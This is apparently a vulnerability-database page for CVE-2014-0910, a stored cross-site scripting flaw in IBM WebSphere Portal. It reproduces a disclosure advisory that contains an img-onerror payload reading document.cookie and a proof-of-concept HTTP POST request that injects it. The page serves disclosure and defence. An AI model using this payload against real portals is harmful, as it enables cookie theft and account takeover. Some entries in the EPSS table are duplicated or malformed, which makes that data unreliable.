CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Cross-site scripting (XSS) vulnerability in IBM WebSphere Portal 6.1.0.0 through 6.1.0.6 CF27, 6.1.5.0 through 6.1.5.3 CF27, and 7.0.0 through 7.0.0.2 CF28 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
3.5
AV:N/AC:M/Au:S/C:N/I:P/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
2.19%
–
–
2022-03-06
–
–
2.19%
–
–
2022-04-03
–
–
2.19%
–
–
2022-06-12
–
–
2.19%
–
–
2022-12-25
–
–
2.19%
–
–
2023-01-01
–
–
2.19%
–
–
2023-02-19
–
–
2.19%
–
–
2023-03-12
–
–
–
0.4%
–
2023-03-19
–
–
–
0.4%
–
2023-03-26
–
–
–
0.4%
–
2023-04-02
–
–
–
0.4%
–
2023-10-01
–
–
–
0.4%
–
2024-02-11
–
–
–
0.4%
–
2024-06-02
–
–
–
0.4%
–
2024-06-16
–
–
–
0.37%
–
2024-11-10
–
–
–
0.16%
–
2024-12-22
–
–
–
0.16%
–
2025-01-05
–
–
–
0.19%
–
2025-02-09
–
–
–
0.19%
–
2025-02-16
–
–
–
0.19%
–
2025-03-09
–
–
–
0.24%
–
2025-01-19
–
–
–
0.19%
–
2025-02-16
–
–
–
0.19%
–
2025-03-09
–
–
–
0.24%
–
2025-03-18
–
–
–
–
0.89%
2025-03-30
–
–
–
–
1.28%
2025-05-01
–
–
–
–
1.28%
2025-05-04
–
–
–
–
1.28%
2025-05-04
–
–
–
–
1.28,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2015-05-06 22h00 +00:00 Author : Filippo Roncari EDB Verified : No
IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability [CVE-2014-0910]
[+] Author: Filippo Roncari
[+] Target: IBM WebSphere Portal
[+] Version: 7.0, 6.1.5, 6.1.0
[+] Vendor: http://www.ibm.com
[+] Accessibility: Remote
[+] Severity: Medium
[+] CVE: CVE-2014-0910
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf
[+] Info: f.roncari@securenetwork.it
[+] Summary
IBM WebSphere Portal is a leader in the market product that provides enterprise web portals to help companies deliver a highly-personalized, social experience for their customers. IBM WebSphere Portal gives users a single point of access to the applications, services, information and social connections they need.
[+] Vulnerability Details
IBM WebSphere Portal is prone to a stored Cross-Site Scripting (XSS) vulnerability in the Web Content Management component, which allows authenticated users to inject arbitrary JavaScript.
A potential attacker authenticated to the Web Content Management can exploit this vulnerability by creating a malicious web content and persuading the victim to visit it. This issue can lead to different kind of user-targeted attacks such as cookie stealing and account violation.
[+] Technical Details
View full advisory at https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf for technical details and source code.
[+] Proof of Concept (PoC)
Authors are able to insert HTML tags through the HTML view of the Rich Text Editor when creating a new web content, although active scripts are blocked and not executed. However it is possible to inject arbitrary JavaScript using a licit tag such as "img". Rich Text Editor tries to correctly handle the tag allowing client-side script being executed. A trivial payload like the following can be used:
[!] Sample Payload
-------------------------
<img src=a onerror=alert(document.cookie)>
-------------------------
An exemplifying HTTP request is reported below.
[!] PoC HTTP Request
-------------------------
POST portal/!ut/p/b1/pZHLboMwEEW_KLJJeC5HGHAQkJZQCt5EzqMmx[...] HTTP/1.1 Host:
Proxy-Connection: keep-alive
Content-Length: 20108
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAzBIVym1up1GRKBv Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------W ebKitFormBoundaryAzBIVym1up1GRKBv
Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wh"
save_and_read_controllable
------W ebKitFormBoundaryAzBIVym1up1GRKBv
Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wa"
[...] true
------W ebKitFormBoundaryAzBIVym1up1GRKBv
Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14Content_inithtml"
------W ebKitFormBoundaryAzBIVym1up1GRKBv
Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_cmpnt_map_19W14388ed1e14Content"
<img src=a onerror=alert(document.cookie)>
------W ebKitFormBoundaryAzBIVym1up1GRKBv
Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14_RTE"
-------------------------
For further details and explanations check the full advisory.
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.